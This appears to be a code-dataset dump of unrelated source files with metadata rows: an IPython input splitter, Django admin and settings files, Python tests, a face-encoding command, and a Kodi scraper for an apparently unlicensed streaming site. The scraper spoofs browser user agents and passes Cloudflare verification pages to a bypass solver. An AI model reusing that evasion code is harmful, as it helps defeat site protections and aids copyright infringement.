# List with lines of raw input accumulated so far.
_buffer_raw = None
def __init__(self, line_input_checker=True, physical_line_transforms=None,
logical_line_transforms=None, python_line_transforms=None):
super(IPythonInputSplitter, self).__init__()
self._buffer_raw = []
self._validate = True
if physical_line_transforms is not None:
self.physical_line_transforms = physical_line_transforms
else:
self.physical_line_transforms = [
leading_indent(),
classic_prompt(),
ipy_prompt(),
cellmagic(end_on_blank_line=line_input_checker),
]
self.assemble_logical_lines = assemble_logical_lines()
if logical_line_transforms is not None:
self.logical_line_transforms = logical_line_transforms
else:
self.logical_line_transforms = [
help_end(),
escaped_commands(),
assign_from_magic(),
assign_from_system(),
]
self.assemble_python_lines = assemble_python_lines()
if python_line_transforms is not None:
self.python_line_transforms = python_line_transforms
else:
# We don't use any of these at present
self.python_line_transforms = []
@property
def transforms(self):
"Quick access to all transformers."
return self.physical_line_transforms + \
[self.assemble_logical_lines] + self.logical_line_transforms + \
[self.assemble_python_lines] + self.python_line_transforms
@property
def transforms_in_use(self):
"""Transformers, excluding logical line transformers if we're in a
Python line."""
t = self.physical_line_transforms[:]
if not self.within_python_line:
t += [self.assemble_logical_lines] + self.logical_line_transforms
return t + [self.assemble_python_lines] + self.python_line_transforms
def reset(self):
"""Reset the input buffer and associated state."""
super(IPythonInputSplitter, self).reset()
self._buffer_raw[:] = []
self.source_raw = ''
self.transformer_accumulating = False
self.within_python_line = False
for t in self.transforms:
try:
t.reset()
except SyntaxError:
# Nothing that calls reset() expects to handle transformer
# errors
pass
def flush_transformers(self):
def _flush(transform, outs):
"""yield transformed lines
always strings, never None
transform: the current transform
outs: an iterable of previously transformed inputs.
Each may be multiline, which will be passed
one line at a time to transform.
"""
for out in outs:
for line in out.splitlines():
# push one line at a time
tmp = transform.push(line)
if tmp is not None:
yield tmp
# reset the transform
tmp = transform.reset()
if tmp is not None:
yield tmp
out = []
for t in self.transforms_in_use:
out = _flush(t, out)
out = list(out)
if out:
self._store('\n'.join(out))
def raw_reset(self):
"""Return raw input only and perform a full reset.
"""
out = self.source_raw
self.reset()
return out
def source_reset(self):
try:
self.flush_transformers()
return self.source
finally:
self.reset()
def push_accepts_more(self):
if self.transformer_accumulating:
return True
else:
return super(IPythonInputSplitter, self).push_accepts_more()
def transform_cell(self, cell):
"""Process and translate a cell of input.
"""
self.reset()
try:
self.push(cell)
self.flush_transformers()
return self.source
finally:
self.reset()
def push(self, lines:str) -> bool:
"""Push one or more lines of IPython input.
This stores the given lines and returns a status code indicating
whether the code forms a complete Python block or not, after processing
all input lines for special IPython syntax.
Any exceptions generated in compilation are swallowed, but if an
exception was produced, the method returns True.
Parameters
----------
lines : string
One or more lines of Python input.
Returns
-------
is_complete : boolean
True if the current input source (the result of the current input
plus prior inputs) forms a complete Python execution block. Note that
this value is also stored as a private attribute (_is_complete), so it
can be queried at any time.
"""
assert isinstance(lines, str)
# We must ensure all input is pure unicode
# ''.splitlines() --> [], but we need to push the empty line to transformers
lines_list = lines.splitlines()
if not lines_list:
lines_list = ['']
# Store raw source before applying any transformations to it. Note
# that this must be done *after* the reset() call that would otherwise
# flush the buffer.
self._store(lines, self._buffer_raw, 'source_raw')
transformed_lines_list = []
for line in lines_list:
transformed = self._transform_line(line)
if transformed is not None:
transformed_lines_list.append(transformed)
if transformed_lines_list:
transformed_lines = '\n'.join(transformed_lines_list)
return super(IPythonInputSplitter, self).push(transformed_lines)
else:
# Got nothing back from transformers - they must be waiting for
# more input.
return False
def _transform_line(self, line):
"""Push a line of input code through the various transformers.
Returns any output from the transformers, or None if a transformer
is accumulating lines.
Sets self.transformer_accumulating as a side effect.
"""
def _accumulating(dbg):
#print(dbg)
self.transformer_accumulating = True
return None
for transformer in self.physical_line_transforms:
line = transformer.push(line)
if line is None:
return _accumulating(transformer)
if not self.within_python_line:
line = self.assemble_logical_lines.push(line)
if line is None:
return _accumulating('acc logical line')
for transformer in self.logical_line_transforms:
line = transformer.push(line)
if line is None:
return _accumulating(transformer)
line = self.assemble_python_lines.push(line)
if line is None:
self.within_python_line = True
return _accumulating('acc python line')
else:
self.within_python_line = False
for transformer in self.python_line_transforms:
line = transformer.push(line)
if line is None:
return _accumulating(transformer)
#print("transformers clear") #debug
self.transformer_accumulating = False
return line
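# Usage sketch (added for illustration; not part of the original module):
# transform_cell() is the one-shot entry point that rewrites IPython special
# syntax into plain Python; the exact output depends on the active transformers.
#
#   isp = IPythonInputSplitter()
#   isp.transform_cell('%time x = 1')
#   # -> something like "get_ipython().magic('time x = 1')\n"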
|
mit
| 8,784,860,315,369,942,000
| 35.470207
| 109
| 0.58764
| false
| 4.60049
| false
| false
| false
|
Ajapaik/ajapaik-web
|
ajapaik/ajapaik_face_recognition/management/commands/run_face_encoding_on_unencoded_rectangles.py
|
1
|
1387
|
import multiprocessing
from json import loads, dumps
import face_recognition
from django.core.management.base import BaseCommand
from ajapaik.ajapaik_face_recognition.models import FaceRecognitionRectangle
def encode_single_rectangle(rectangle: FaceRecognitionRectangle) -> None:
print('Processing rectangle %s' % rectangle.pk)
try:
image = face_recognition.load_image_file(rectangle.photo.image)
except: # noqa
return
try:
encodings = face_recognition.face_encodings(image, known_face_locations=[loads(rectangle.coordinates)])
except: # noqa
return
if len(encodings) == 1:
my_encoding = encodings[0]
try:
rectangle.face_encoding = dumps(my_encoding.tolist())
rectangle.save()
except: # noqa
return
else:
        print('Found %s face encodings for rectangle %s, should find only 1' % (len(encodings), rectangle.id))
class Command(BaseCommand):
help = 'Will run face encoding on all identified faces'
args = 'subject_id'
def handle(self, *args, **options):
unknown_rectangles = FaceRecognitionRectangle.objects.filter(face_encoding__isnull=True).all()
print('Found %s rectangles to run on' % unknown_rectangles.count())
with multiprocessing.Pool() as pool:
pool.map(encode_single_rectangle, unknown_rectangles)
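# Usage sketch (illustrative): run as a regular management command from a
# configured Django project, either from the shell or programmatically.
#
#   python manage.py run_face_encoding_on_unencoded_rectangles
#
#   from django.core.management import call_command
#   call_command('run_face_encoding_on_unencoded_rectangles')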
|
gpl-3.0
| -8,899,417,717,405,903,000
| 34.564103
| 111
| 0.681327
| false
| 4.031977
| false
| false
| false
|
Tejal011089/trufil-erpnext
|
erpnext/stock/doctype/item/test_item.py
|
1
|
2870
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import unittest
import frappe
from frappe.test_runner import make_test_records
from erpnext.stock.doctype.item.item import WarehouseNotSet, ItemTemplateCannotHaveStock
from erpnext.stock.doctype.stock_entry.test_stock_entry import make_stock_entry
test_ignore = ["BOM"]
test_dependencies = ["Warehouse"]
def make_item(item_code, properties=None):
if frappe.db.exists("Item", item_code):
return frappe.get_doc("Item", item_code)
item = frappe.get_doc({
"doctype": "Item",
"item_code": item_code,
"item_name": item_code,
"description": item_code,
"item_group": "Products"
})
if properties:
item.update(properties)
if item.is_stock_item and not item.default_warehouse:
item.default_warehouse = "_Test Warehouse - _TC"
item.insert()
return item
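# Example (illustrative): other tests typically use the helper above to create
# fixtures lazily; the item code and properties here are hypothetical.
#
#   item = make_item("_Test Sample Item", {"is_stock_item": 1})
#   item.name   # "_Test Sample Item"; subsequent calls return the same document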
class TestItem(unittest.TestCase):
def get_item(self, idx):
item_code = test_records[idx].get("item_code")
if not frappe.db.exists("Item", item_code):
item = frappe.copy_doc(test_records[idx])
item.insert()
else:
item = frappe.get_doc("Item", item_code)
return item
def test_template_cannot_have_stock(self):
item = self.get_item(10)
make_stock_entry(item_code=item.name, target="Stores - _TC", qty=1, incoming_rate=1)
item.has_variants = 1
self.assertRaises(ItemTemplateCannotHaveStock, item.save)
def test_default_warehouse(self):
item = frappe.copy_doc(test_records[0])
item.is_stock_item = 1
item.default_warehouse = None
self.assertRaises(WarehouseNotSet, item.insert)
def test_get_item_details(self):
from erpnext.stock.get_item_details import get_item_details
to_check = {
"item_code": "_Test Item",
"item_name": "_Test Item",
"description": "_Test Item 1",
"warehouse": "_Test Warehouse - _TC",
"income_account": "Sales - _TC",
"expense_account": "_Test Account Cost for Goods Sold - _TC",
"cost_center": "_Test Cost Center 2 - _TC",
"qty": 1.0,
"price_list_rate": 100.0,
"base_price_list_rate": 0.0,
"discount_percentage": 0.0,
"rate": 0.0,
"base_rate": 0.0,
"amount": 0.0,
"base_amount": 0.0,
"batch_no": None,
"item_tax_rate": '{}',
"uom": "_Test UOM",
"conversion_factor": 1.0,
}
make_test_records("Item Price")
details = get_item_details({
"item_code": "_Test Item",
"company": "_Test Company",
"price_list": "_Test Price List",
"currency": "_Test Currency",
"parenttype": "Sales Order",
"conversion_rate": 1,
"price_list_currency": "_Test Currency",
"plc_conversion_rate": 1,
"order_type": "Sales",
"transaction_type": "selling"
})
for key, value in to_check.iteritems():
self.assertEquals(value, details.get(key))
test_records = frappe.get_test_records('Item')
|
agpl-3.0
| -5,232,201,362,335,797,000
| 27.137255
| 88
| 0.674913
| false
| 2.937564
| true
| false
| false
|
petterreinholdtsen/frikanalen
|
fkbeta/fk/admin.py
|
1
|
2538
|
# Copyright (c) 2012-2013 Benjamin Bruheim <grolgh@gmail.com>
# This file is covered by the LGPLv3 or later, read COPYING for details.
from django.contrib import admin
from django.contrib.auth.models import User
from django.contrib.auth.admin import UserAdmin
from fk.models import FileFormat
from fk.models import Organization
from fk.models import UserProfile
from fk.models import Video, Category, Scheduleitem
from fk.models import VideoFile
from fk.models import SchedulePurpose, WeeklySlot
# In order to display the userprofile inline on the User admin page,
admin.site.unregister(User)
class UserProfileInline(admin.StackedInline):
model = UserProfile
class UserProfileAdmin(UserAdmin):
inlines = [ UserProfileInline, ]
class VideoFileInline(admin.StackedInline):
fields = ('format', 'filename', 'old_filename')
#readonly_fields = ['format', 'filename']
model = VideoFile
extra = 0
class VideoAdmin(admin.ModelAdmin):
list_display = ('name', 'editor', 'organization')
inlines = [VideoFileInline]
search_fields = ["name", "description", "organization__name", "header", "editor__username"]
list_filter = ("proper_import", "is_filler", "publish_on_web", "has_tono_records")
class OrganizationAdmin(admin.ModelAdmin):
list_display = ('name', 'fkmember', 'orgnr')
filter_horizontal = ("members",)
list_filter = ('fkmember',)
ordering = ('name',)
class ScheduleitemAdmin(admin.ModelAdmin):
list_filter = ("starttime", )
list_display = ('__str__',
'video',
'schedulereason',
'starttime',
'duration')
#list_display_links = ('starttime', 'video',)
#inlines = [VideoInline]
#exclude = ('video',)
search_fields = ["video__name", "video__organization__name"]
ordering = ('starttime',)
class SchedulePurposeAdmin(admin.ModelAdmin):
list_display = (
'__str__',
'videos_str',
)
filter_horizontal = ('direct_videos',)
class WeeklySlotAdmin(admin.ModelAdmin):
list_display = (
'__str__',
'day',
'start_time',
'duration',
'purpose',
)
admin.site.register(Category)
admin.site.register(FileFormat)
admin.site.register(Organization, OrganizationAdmin)
admin.site.register(SchedulePurpose, SchedulePurposeAdmin)
admin.site.register(Scheduleitem, ScheduleitemAdmin)
admin.site.register(User, UserProfileAdmin)
admin.site.register(Video, VideoAdmin)
admin.site.register(VideoFile)
admin.site.register(WeeklySlot, WeeklySlotAdmin)
|
lgpl-3.0
| -431,953,171,379,978,940
| 31.126582
| 95
| 0.684791
| false
| 3.85129
| false
| false
| false
|
janusnic/ecommerce
|
ecommerce/settings/local.py
|
1
|
4047
|
"""Development settings and globals."""
from __future__ import absolute_import
import os
from os.path import join, normpath
from ecommerce.settings.base import *
from ecommerce.settings.logger import get_logger_config
# DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
# END DEBUG CONFIGURATION
# EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# END EMAIL CONFIGURATION
# DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': normpath(join(DJANGO_ROOT, 'default.db')),
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
'ATOMIC_REQUESTS': True,
}
}
# END DATABASE CONFIGURATION
# CACHE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
# END CACHE CONFIGURATION
# TOOLBAR CONFIGURATION
# See: http://django-debug-toolbar.readthedocs.org/en/latest/installation.html#explicit-setup
if os.environ.get('ENABLE_DJANGO_TOOLBAR', False):
INSTALLED_APPS += (
'debug_toolbar',
)
MIDDLEWARE_CLASSES += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
DEBUG_TOOLBAR_PATCH_SETTINGS = False
# http://django-debug-toolbar.readthedocs.org/en/latest/installation.html
INTERNAL_IPS = ('127.0.0.1',)
# END TOOLBAR CONFIGURATION
# URL CONFIGURATION
ECOMMERCE_URL_ROOT = 'http://localhost:8002'
LMS_URL_ROOT = 'http://127.0.0.1:8000'
# The location of the LMS heartbeat page
LMS_HEARTBEAT_URL = get_lms_url('/heartbeat')
# The location of the LMS student dashboard
LMS_DASHBOARD_URL = get_lms_url('/dashboard')
OAUTH2_PROVIDER_URL = get_lms_url('/oauth2')
COMMERCE_API_URL = get_lms_url('/api/commerce/v1/')
# END URL CONFIGURATION
# AUTHENTICATION
# Set these to the correct values for your OAuth2/OpenID Connect provider (e.g., devstack)
SOCIAL_AUTH_EDX_OIDC_KEY = 'replace-me'
SOCIAL_AUTH_EDX_OIDC_SECRET = 'replace-me'
SOCIAL_AUTH_EDX_OIDC_URL_ROOT = OAUTH2_PROVIDER_URL
SOCIAL_AUTH_EDX_OIDC_ID_TOKEN_DECRYPTION_KEY = SOCIAL_AUTH_EDX_OIDC_SECRET
JWT_AUTH.update({
'JWT_SECRET_KEY': 'insecure-secret-key',
'JWT_ISSUER': OAUTH2_PROVIDER_URL
})
# END AUTHENTICATION
# ORDER PROCESSING
ENROLLMENT_API_URL = get_lms_url('/api/enrollment/v1/enrollment')
ENROLLMENT_FULFILLMENT_TIMEOUT = 15 # devstack is slow!
EDX_API_KEY = 'replace-me'
# END ORDER PROCESSING
# PAYMENT PROCESSING
PAYMENT_PROCESSOR_CONFIG = {
'cybersource': {
'soap_api_url': 'https://ics2wstest.ic3.com/commerce/1.x/transactionProcessor/CyberSourceTransaction_1.115.wsdl',
'merchant_id': 'fake-merchant-id',
'transaction_key': 'fake-transaction-key',
'profile_id': 'fake-profile-id',
'access_key': 'fake-access-key',
'secret_key': 'fake-secret-key',
'payment_page_url': 'https://testsecureacceptance.cybersource.com/pay',
'receipt_page_url': get_lms_url('/commerce/checkout/receipt/'),
'cancel_page_url': get_lms_url('/commerce/checkout/cancel/'),
},
'paypal': {
'mode': 'sandbox',
'client_id': 'fake-client-id',
'client_secret': 'fake-client-secret',
'receipt_url': get_lms_url('/commerce/checkout/receipt/'),
'cancel_url': get_lms_url('/commerce/checkout/cancel/'),
},
}
# END PAYMENT PROCESSING
ENABLE_AUTO_AUTH = True
LOGGING = get_logger_config(debug=DEBUG, dev_env=True, local_loglevel='DEBUG')
#####################################################################
# Lastly, see if the developer has any local overrides.
try:
from .private import * # pylint: disable=import-error
except ImportError:
pass
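# Example private.py (illustrative): developer-specific overrides live next to
# this module and stay out of version control; the values are hypothetical.
#
#   # ecommerce/settings/private.py
#   EDX_API_KEY = 'my-local-key'
#   SOCIAL_AUTH_EDX_OIDC_KEY = 'my-oidc-key'
#   SOCIAL_AUTH_EDX_OIDC_SECRET = 'my-oidc-secret'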
|
agpl-3.0
| -3,845,165,324,190,291,000
| 27.907143
| 121
| 0.677045
| false
| 3.227273
| true
| false
| false
|
mmasaki/trove
|
trove/tests/tempest/tests/api/versions/test_versions.py
|
1
|
1650
|
# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from testtools import testcase as testtools
from trove.tests.tempest.tests.api import base
class DatabaseVersionsTest(base.BaseDatabaseTest):
@classmethod
def setup_clients(cls):
super(DatabaseVersionsTest, cls).setup_clients()
cls.client = cls.database_versions_client
@testtools.attr('smoke')
@decorators.idempotent_id('6952cd77-90cd-4dca-bb60-8e2c797940cf')
def test_list_db_versions(self):
versions = self.client.list_db_versions()['versions']
self.assertTrue(len(versions) > 0, "No database versions found")
# List of all versions should contain the current version, and there
# should only be one 'current' version
current_versions = list()
for version in versions:
if 'CURRENT' == version['status']:
current_versions.append(version['id'])
self.assertEqual(1, len(current_versions))
self.assertIn(self.db_current_version, current_versions)
|
apache-2.0
| -8,393,112,534,774,205,000
| 39.243902
| 78
| 0.704242
| false
| 4.084158
| true
| false
| false
|
felipenaselva/repo.felipe
|
plugin.video.velocity/scrapers/putlocker_both.py
|
1
|
15716
|
import urllib2,urllib,re,os
import random
import urlparse
import sys
import xbmcplugin,xbmcgui,xbmc, xbmcaddon, downloader, extract, time
import tools
from libs import kodi
from tm_libs import dom_parser
from libs import log_utils
import tools
from libs import cloudflare
from libs import log_utils
from tm_libs import dom_parser
import cookielib
from StringIO import StringIO
import gzip
import main_scrape
import base64
addon_id = kodi.addon_id
timeout = int(kodi.get_setting('scraper_timeout'))
tools.create_directory(tools.AOPATH, "All_Cookies/Putlocker")
cookiepath = xbmc.translatePath(os.path.join('special://home','addons',addon_id,'All_Cookies','Putlocker/'))
cookiejar = os.path.join(cookiepath,'cookies.lwp')
cj = cookielib.LWPCookieJar()
cookie_file = os.path.join(cookiepath,'cookies.lwp')
def __enum(**enums):
return type('Enum', (), enums)
MAX_RESPONSE = 1024 * 1024 * 2
FORCE_NO_MATCH = '***FORCE_NO_MATCH***'
QUALITIES = __enum(LOW='Low', MEDIUM='Medium', HIGH='High', HD720='HD720', HD1080='HD1080')
XHR = {'X-Requested-With': 'XMLHttpRequest'}
USER_AGENT = "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
BR_VERS = [
['%s.0' % i for i in xrange(18, 43)],
['37.0.2062.103', '37.0.2062.120', '37.0.2062.124', '38.0.2125.101', '38.0.2125.104', '38.0.2125.111', '39.0.2171.71', '39.0.2171.95', '39.0.2171.99', '40.0.2214.93', '40.0.2214.111',
'40.0.2214.115', '42.0.2311.90', '42.0.2311.135', '42.0.2311.152', '43.0.2357.81', '43.0.2357.124', '44.0.2403.155', '44.0.2403.157', '45.0.2454.101', '45.0.2454.85', '46.0.2490.71',
'46.0.2490.80', '46.0.2490.86', '47.0.2526.73', '47.0.2526.80'],
['11.0']]
WIN_VERS = ['Windows NT 10.0', 'Windows NT 7.0', 'Windows NT 6.3', 'Windows NT 6.2', 'Windows NT 6.1', 'Windows NT 6.0', 'Windows NT 5.1', 'Windows NT 5.0']
FEATURES = ['; WOW64', '; Win64; IA64', '; Win64; x64', '']
RAND_UAS = ['Mozilla/5.0 ({win_ver}{feature}; rv:{br_ver}) Gecko/20100101 Firefox/{br_ver}',
'Mozilla/5.0 ({win_ver}{feature}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{br_ver} Safari/537.36',
'Mozilla/5.0 ({win_ver}{feature}; Trident/7.0; rv:{br_ver}) like Gecko']
HOST_Q = {}
HOST_Q[QUALITIES.LOW] = ['youwatch', 'allmyvideos', 'played.to', 'gorillavid']
HOST_Q[QUALITIES.MEDIUM] = ['primeshare', 'exashare', 'bestreams', 'flashx', 'vidto', 'vodlocker', 'thevideo', 'vidzi', 'vidbull',
'realvid', 'nosvideo', 'daclips', 'sharerepo', 'zalaa', 'filehoot', 'vshare']
HOST_Q[QUALITIES.HIGH] = ['vidspot', 'mrfile', 'divxstage', 'streamcloud', 'mooshare', 'novamov', 'mail.ru', 'vid.ag']
HOST_Q[QUALITIES.HD720] = ['thefile', 'sharesix', 'filenuke', 'vidxden', 'movshare', 'nowvideo', 'vidbux', 'streamin.to', 'allvid.ch']
HOST_Q[QUALITIES.HD1080] = ['hugefiles', '180upload', 'mightyupload', 'videomega', 'allmyvideos']
Q_ORDER = {QUALITIES.LOW: 1, QUALITIES.MEDIUM: 2, QUALITIES.HIGH: 3, QUALITIES.HD720: 4, QUALITIES.HD1080: 5}
# base_url = 'http://www.santaseries.com'
base_url = kodi.get_setting('putlocker_base_url')
def format_source_label( item):
if 'label' in item:
return '[%s] %s (%s)' % (item['quality'], item['host'], item['label'])
else:
return '[%s] %s' % (item['quality'], item['host'])
def _http_get(url, cookies=None, data=None, multipart_data=None, headers=None, allow_redirect=True, cache_limit=8):
return get_cooked_url(url, base_url, timeout, cookies=cookies, data=data, multipart_data=multipart_data,
headers=headers, allow_redirect=allow_redirect, cache_limit=cache_limit)
def get_cooked_url(url, base_url, timeout, cookies=None, data=None, multipart_data=None, headers=None, allow_redirect=True, cache_limit=8):
if cookies is None: cookies = {}
if timeout == 0: timeout = None
if headers is None: headers = {}
referer = headers['Referer'] if 'Referer' in headers else url
if kodi.get_setting('debug') == "true":
log_utils.log('Getting Url: %s cookie=|%s| data=|%s| extra headers=|%s|' % (url, cookies, data, headers))
if data is not None:
if isinstance(data, basestring):
data = data
else:
data = urllib.urlencode(data, True)
if multipart_data is not None:
headers['Content-Type'] = 'multipart/form-data; boundary=X-X-X'
data = multipart_data
try:
cj = _set_cookies(base_url, cookies)
request = urllib2.Request(url, data=data)
request.add_header('User-Agent', _get_ua())
#request.add_unredirected_header('Host', base_url)
request.add_unredirected_header('Referer', referer)
for key in headers: request.add_header(key, headers[key])
cj.add_cookie_header(request)
if not allow_redirect:
opener = urllib2.build_opener(NoRedirection)
urllib2.install_opener(opener)
else:
opener = urllib2.build_opener(urllib2.HTTPRedirectHandler)
urllib2.install_opener(opener)
opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener2)
response = urllib2.urlopen(request, timeout=timeout)
cj.extract_cookies(response, request)
if kodi.get_setting('debug') == "true":
print 'Response Cookies: %s - %s' % (url, cookies_as_str(cj))
__fix_bad_cookies()
cj.save(ignore_discard=True)
if not allow_redirect and (response.getcode() in [301, 302, 303, 307] or response.info().getheader('Refresh')):
if response.info().getheader('Refresh') is not None:
refresh = response.info().getheader('Refresh')
return refresh.split(';')[-1].split('url=')[-1]
else:
return response.info().getheader('Location')
content_length = response.info().getheader('Content-Length', 0)
if int(content_length) > MAX_RESPONSE:
print 'Response exceeded allowed size. %s => %s / %s' % (url, content_length, MAX_RESPONSE)
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO(response.read(MAX_RESPONSE))
f = gzip.GzipFile(fileobj=buf)
html = f.read()
else:
html = response.read(MAX_RESPONSE)
except urllib2.HTTPError as e:
if e.code == 503 and 'cf-browser-verification' in e.read():
print "WAS ERROR"
html = cloudflare.solve(url, cj, _get_ua())
if not html:
return ''
else:
print 'Error (%s) during THE scraper http get: %s' % (str(e), url)
return ''
except Exception as e:
print 'Error (%s) during scraper http get: %s' % (str(e), url)
return ''
return html
def get_url(url):
request=urllib2.Request(url)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36')
response=urllib2.urlopen(request)
link=response.read()
cj.save(cookie_file, ignore_discard=True)
response.close()
return link
def _get_ua():
index = random.randrange(len(RAND_UAS))
user_agent = RAND_UAS[index].format(win_ver=random.choice(WIN_VERS), feature=random.choice(FEATURES), br_ver=random.choice(BR_VERS[index]))
print 'Creating New User Agent: %s' % (user_agent)
return user_agent
def _pathify_url(url):
url = url.replace('\/', '/')
pieces = urlparse.urlparse(url)
if pieces.scheme:
strip = pieces.scheme + ':'
else:
strip = ''
strip += '//' + pieces.netloc
url = url.replace(strip, '')
if not url.startswith('/'): url = '/' + url
url = url.replace('/./', '/')
print "returning pathify "+ url
return url
def _default_get_episode_url(show_url, video, episode_pattern, title_pattern='', airdate_pattern='', data=None, headers=None):
if 'http://' not in show_url:
url = urlparse.urljoin(base_url, show_url)
else:
url = base_url+show_url
html = get_url(url)
if html:
match = re.search(episode_pattern, html, re.DOTALL)
if match:
return _pathify_url(match.group(1))
else:
log_utils.log('Skipping as Episode not found: %s' % (url), log_utils.LOGDEBUG)
def make_vid_params(video_type, title, year, season, episode, ep_title, ep_airdate):
return '|%s|%s|%s|%s|%s|%s|%s|' % (video_type, title, year, season, episode, ep_title, ep_airdate)
def _set_cookies(base_url, cookies):
cj = cookielib.LWPCookieJar(cookie_file)
try: cj.load(ignore_discard=True)
except: pass
if kodi.get_setting('debug') == "true":
print 'Before Cookies: %s' % (cookies_as_str(cj))
domain = urlparse.urlsplit(base_url).hostname
for key in cookies:
c = cookielib.Cookie(0, key, str(cookies[key]), port=None, port_specified=False, domain=domain, domain_specified=True,
domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=False, comment=None,
comment_url=None, rest={})
cj.set_cookie(c)
cj.save(ignore_discard=True)
if kodi.get_setting('debug') == "true":
print 'After Cookies: %s' % (cookies_as_str(cj))
return cj
def cookies_as_str(cj):
s = ''
c = cj._cookies
for domain in c:
s += '{%s: ' % (domain)
for path in c[domain]:
s += '{%s: ' % (path)
for cookie in c[domain][path]:
s += '{%s=%s}' % (cookie, c[domain][path][cookie].value)
s += '}'
s += '} '
return s
def __fix_bad_cookies():
c = cj._cookies
for domain in c:
for path in c[domain]:
for key in c[domain][path]:
cookie = c[domain][path][key]
if cookie.expires > sys.maxint:
print 'Fixing cookie expiration for %s: was: %s now: %s' % (key, cookie.expires, sys.maxint)
cookie.expires = sys.maxint
def get_quality(video, host, base_quality=None):
host = host.lower()
# Assume movies are low quality, tv shows are high quality
if base_quality is None:
if video.video_type == "movies":
quality = QUALITIES.LOW
else:
quality = QUALITIES.HIGH
else:
quality = base_quality
host_quality = None
if host:
for key in HOST_Q:
if any(hostname in host for hostname in HOST_Q[key]):
host_quality = key
break
if host_quality is not None and Q_ORDER[host_quality] < Q_ORDER[quality]:
quality = host_quality
return quality
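# Example (illustrative): quality is capped at the host's known capability.
# A TV episode defaults to HIGH, but 'gorillavid' is mapped as a LOW host, so
# the result drops to LOW; the dummy video object below is hypothetical.
#
#   video = type('Video', (object,), {'video_type': 'shows'})()
#   get_quality(video, 'http://gorillavid.in/embed-abc123')   # -> 'Low'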
################ Below are custom changes per scraper #################
def _get_episode_url(show_url, video,season,episode):
episode_pattern = 'href="([^"]+season-%s-episode-%s-[^"]+)' % (season, episode)
title_pattern = 'href="(?P<url>[^"]+season-\d+-episode-\d+-[^"]+).*? \s+(?P<title>.*?)</td>'
return _default_get_episode_url(show_url, video, episode_pattern, title_pattern)
def search(video_type, title, year):
search_url = urlparse.urljoin(base_url, '/search/advanced_search.php?q=%s' % (urllib.quote_plus(title)))
if not year: year = 'Year'
search_url += '&year_from=%s&year_to=%s' % (year, year)
if video_type == "shows":
        search_url += '&section=2'
else:
        search_url += '&section=1'
html = _http_get(search_url, cache_limit=.25)
results = []
if not re.search('Sorry.*?find.*?looking\s+for', html, re.I):
r = re.search('Search Results For: "(.*?)</table>', html, re.DOTALL)
if r:
fragment = r.group(1)
pattern = r'<a\s+href="([^"]+)"\s+title="([^"]+)'
for match in re.finditer(pattern, fragment):
url, title_year = match.groups('')
match = re.search('(.*)\s+\((\d{4})\)', title_year)
if match:
match_title, match_year = match.groups()
else:
match_title = title_year
match_year = ''
result = {'url': _pathify_url(url), 'title': match_title, 'year': match_year}
results.append(result)
results = dict((result['url'], result) for result in results).values()
return results
def get_sources(video):
source_url = urlparse.urljoin(base_url, video)
#source_url = get_url(video)
hosters = []
if source_url and source_url != FORCE_NO_MATCH:
url = urlparse.urljoin(base_url, source_url)
html = _http_get(url, cache_limit=.5)
for match in re.finditer('<a[^>]+href="([^"]+)[^>]+>(Version \d+)<', html):
url, version = match.groups()
host = urlparse.urlsplit(url).hostname.replace('embed.', '')
hoster = {'hostname':'Putlocker','multi-part': False, 'host': host, 'quality': get_quality(video, host, QUALITIES.HIGH), 'views': None, 'rating': None, 'url': url, 'direct': False}
hoster['version'] = version
hosters.append(hoster)
return hosters
def putlocker_tv(name,movie_title):
try:
title = movie_title[:-7]
movie_year = movie_title[-6:]
year = movie_year.replace('(','').replace(')','')
video_type = 'shows'
show_url = search(video_type,title,year)
for e in show_url:
url = e['url']
newseas=re.compile('S(.+?)E(.+?) (?P<name>[A-Za-z\t .]+)').findall(name)
print newseas
for sea,epi,epi_title in newseas:
video = make_vid_params('Episode',title,year,sea,epi,epi_title,'')
ep_url = _get_episode_url(url, video,sea,epi)
hosters=get_sources(ep_url)
hosters = main_scrape.apply_urlresolver(hosters)
return hosters
except Exception as e:
hosters =[]
log_utils.log('Error [%s] %s' % (str(e), ''), xbmc.LOGERROR)
if kodi.get_setting('error_notify') == "true":
kodi.notify(header='Putlocker TV',msg='(error) %s %s' % (str(e), ''),duration=5000,sound=None)
return hosters
def putlocker_movies(movie_title):
try:
title = movie_title[:-7]
movie_year = movie_title[-6:]
year = movie_year.replace('(','').replace(')','')
video_type = 'movies'
show_url = search(video_type,title,year)
for e in show_url:
url = e['url']
hosters=get_sources(url)
print "HOSTERS ARE " + str(hosters)
hosters = main_scrape.apply_urlresolver(hosters)
return hosters
except Exception as e:
hosters =[]
log_utils.log('Error [%s] %s' % (str(e), ''), xbmc.LOGERROR)
